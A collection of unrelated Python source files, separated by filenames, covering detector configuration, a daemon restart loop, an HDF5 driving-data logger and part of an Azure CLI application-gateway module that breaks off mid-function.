def configure_xspress3(sclr):
sclr.configuration_attrs = sclr.component_names
sclr.flyer_timestamps.kind = 'omitted'
sclr.roi_data.kind = 'omitted'
sclr.make_directories.kind = 'omitted'
sclr.rewindable.kind = 'omitted'
for k, chan in sclr.channels.items():
chan.configuration_names.kind = 'config'
chan.vis_enabled.kind = 'omitted'
chan.rois.kind = 'normal'
chan.rois.num_rois.kind = 'config'
chan.name = chan.name.replace('annel', '')
for n in chan.rois.component_names:
if 'roi' in n and n != 'num_rois':
roi = getattr(chan.rois, n)
roi.kind = 'normal'
roi.value.kind = 'normal'
roi.value_sum.kind = 'omitted'
else:
attr = getattr(chan.rois, n)
attr.kind = 'config'
configure_xspress3(xspress3)
|
manage_athenad.py
|
#!/usr/bin/env python3
import time
from multiprocessing import Process
from common.params import Params
from selfdrive.manager.process import launcher
from system.swaglog import cloudlog
from system.version import get_version, is_dirty
ATHENA_MGR_PID_PARAM = "AthenadPid"
def main():
params = Params()
dongle_id = params.get("DongleId").decode('utf-8')
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty())
try:
while 1:
cloudlog.info("starting athena daemon")
proc = Process(name='athenad', target=launcher, args=('selfdrive.athena.athenad', 'athenad'))
proc.start()
proc.join()
cloudlog.event("athenad exited", exitcode=proc.exitcode)
time.sleep(5)
except Exception:
cloudlog.exception("manage_athenad.exception")
finally:
params.delete(ATHENA_MGR_PID_PARAM)
if __name__ == '__main__':
main()
|
write_hdf5.py
|
import threading
import queue
import h5py
import time
import os
from .folder_functions import UserPath
class StreamToHDF5(UserPath):
def __init__(self,
image_width: int,
image_height: int,
steering_max: int,
steering_min: int,
throttle_neutral: int,
throttle_max: int,
throttle_min: int,
file_version_number: float = 1.0,
f_name_suffix: str = '_'):
"""
This class streams "frames" (i.e., groups) of data sets to disk using a queue.
Parameters
----------
image_width: (int) image width
image_height: (int) image height
steering_max: (int) steering max value
steering_min: (int) steering min value
throttle_neutral: (int) neutral throttle value
throttle_max: (int) maximum throttle value
throttle_min: (int) minimum throttle value
file_version_number: (float) version of the file format
f_name_suffix: (str) suffix of file name
"""
UserPath.__init__(self, 'miniCar.py')
# Make sure to have a valid value
self.select_user_data_folder('', 'validate')
# Set image dimensions for class usage
self.image_width = image_width
self.image_height = image_height
# Set the current file version
self.fileVersionNum = file_version_number
# Suffix added at the end of the file name
self.fNameSuffix = f_name_suffix
# Set the steering attributes
self.steerMax = steering_max
self.steerMin = steering_min
# Set the throttle attributes
self.throttle_neutral = throttle_neutral
self.throttle_max = throttle_max
self.throttle_min = throttle_min
# Set a lock for control of write function
self.lock = threading.Lock()
# Log file
self.log_file = None
# Do we have a thread actively running
self.thread_running = False
# Frame indexing within queue
self.frame_index = 0
# Create a queue for storing images and driver input
self.log_queue = queue.Queue()
def initiate_stream(self):
"""
Initiate a thread to stream data to a file.
"""
# Create a thread to do actual writing
self.thread_write = threading.Thread(name='WriteHDF5',
target=self.write_queue_threading, args=( ))
self.thread_write.daemon = True
self.thread_write.start()
self.thread_running = True
def write_queue_threading(self):
"""
Threaded method that de-queues data and saves it to disk.
"""
# Acquire a lock
self.lock.acquire()
print('We are about to start the threading!')
# @TODO: Let's keep an eye on this threading stuff: might not work on Jetson
try:
while self.thread_running:
# Get the current data frame from the queue
log_data = self.log_queue.get()
# Each frame of data is a separate group
current_frame = str(log_data[0]).zfill(6)
# Start a new log file every 20000 frames
if not (log_data[0]%20000) == 0:
self.write_data(current_frame, log_data)
# Create a new file
else:
self.create_new_file()
# Write the first frame of the new log file
self.write_data(current_frame, log_data)
finally:
# Release the lock
self.lock.release()
print('Thread lock released.')
def create_new_file(self):
"""
Method that creates a new HDF5 logging file where miniCar
data are saved to disk.
"""
# Create name string for log file
date = time.strftime('%y%m%d')
clock = time.strftime('%H%M%S')
descriptor = '_miniCar'
file_path = os.path.join(self.user_data_folder, date + '_' + clock + descriptor + \
self.fNameSuffix + '.hdf5')
# Open up an HDF5 to store data
self.log_file = h5py.File(file_path, 'w')
# Set storage attributes
if self.fileVersionNum == 1.0:
# This version is for miniCar
self.log_file.attrs['fileVersion'] = 'miniCarDataV1.0'
elif self.fileVersionNum == 1.1:
# This version is for miniCar
self.log_file.attrs['fileVersion'] = 'miniCarDataV1.1'
else:
raise ValueError('Unknown HDF5 file version? ',
'method: create_new_file',
'class: streamToDiskHDF5')
self.log_file.attrs['imgHeight'] = str(self.image_height)
self.log_file.attrs['imgWidth'] = str(self.image_width)
self.log_file.attrs['steerMax'] = str(self.steerMax)
self.log_file.attrs['steerMin'] = str(self.steerMin)
self.log_file.attrs['throttleMax'] = str(self.throttle_max)
self.log_file.attrs['throttleMin'] = str(self.throttle_min)
self.log_file.attrs['throttleNeutral'] = str(self.throttle_neutral)
def write_data(self, current_frame: str, log_data: list):
"""
Method that writes the de-queued "frame" data to an HDF5
group in the file.
Parameters
----------
current_frame: (str) zero-padded frame number that is being written
log_data: (list) array of data being written to given group
"""
frame_name = 'frame_'+ str(current_frame)
self.log_file.create_group(frame_name)
# Within each frame/group, each entry is its own dataset
self.log_file.create_dataset(frame_name+'/frame', data=log_data[0])
self.log_file.create_dataset(frame_name+'/loop_frame_rate', data=log_data[1])
self.log_file.create_dataset(frame_name+'/steering', data=log_data[2])
self.log_file.create_dataset(frame_name+'/throttle', data=log_data[3])
self.log_file.create_dataset(frame_name+'/image', data=log_data[4])
def close_log_file(self):
"""
Method that stops the write thread and closes the file.
"""
self.thread_running = False
self.log_file.close()
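# Minimal usage sketch (not part of the original module). The producer side is
# assumed: something (e.g. the miniCar main loop) pushes
# [frame_index, loop_frame_rate, steering, throttle, image] lists onto log_queue,
# matching the layout consumed by write_data() above; `image` is a camera frame.
#
#   logger = StreamToHDF5(image_width=320, image_height=240,
#                         steering_max=2000, steering_min=1000,
#                         throttle_neutral=1500, throttle_max=2000, throttle_min=1000)
#   logger.initiate_stream()
#   # a new .hdf5 file is opened automatically every 20000 frames (incl. frame 0)
#   logger.log_queue.put([logger.frame_index, 30.0, 1500, 1500, image])
#   logger.frame_index += 1
#   ...
#   logger.close_log_file()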
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError, ArgumentUsageError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
import tempfile
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
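# For illustration: _is_v2_sku('Standard_v2') and _is_v2_sku('WAF_v2') are True,
# while classic SKUs such as 'Standard_Medium' are not.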
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
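    # a frontend IP configuration references either a public IP address or a subnet;
    # in the private case the allocation is Static only when an explicit address is given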
if public_ip_address:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
ssl_profile_id=None, firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
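    # SNI is only required when the listener has both an SSL certificate and a host name;
    # the protocol defaults to HTTPS when a certificate is supplied, HTTP otherwise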
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
if cmd.supported_api_version(min_api='2020-06-01'):
new_listener.ssl_profile = SubResource(id=ssl_profile_id) if ssl_profile_id else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, ssl_profile_id=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if cmd.supported_api_version(min_api='2020-06-01'):
if ssl_profile_id is not None:
instance.ssl_profile = SubResource(id=ssl_profile_id)
if host_names is not None:
instance.host_names = host_names or None
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
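    # build the user-assigned identity map keyed by the identity's resource ID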
    user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
    user_assigned_identities_instance = dict()
    user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
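    # validate that the frontend IP exists and that no frontend IP already references
    # this private link configuration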
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
            raise CLIError('Frontend IP already references an existing Private Link')
if fic.name == frontend_ip:
break
else:
raise CLIError("Frontend IP doesn't exist")
if appgw.private_link_configurations is not None:
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
                raise CLIError('A Private Link configuration with this name already exists')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
for subnet in vnet.subnets:
if subnet.name == private_link_subnet_name_or_id:
            raise CLIError('A subnet with this name already exists')
        if subnet.address_prefix == private_link_subnet_prefix:
            raise CLIError('A subnet with this address prefix already exists')
        if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
            raise CLIError('A subnet with this address prefix already exists')
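    # reuse the subnet if a full resource ID was given; otherwise create a dedicated subnet
    # (with private link service network policies disabled) in the gateway's virtual network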
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
if appgw.private_link_configurations is None:
appgw.private_link_configurations = []
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
    # the leftover subnet has to be deleted manually
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
cert.data = client_cert_data
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
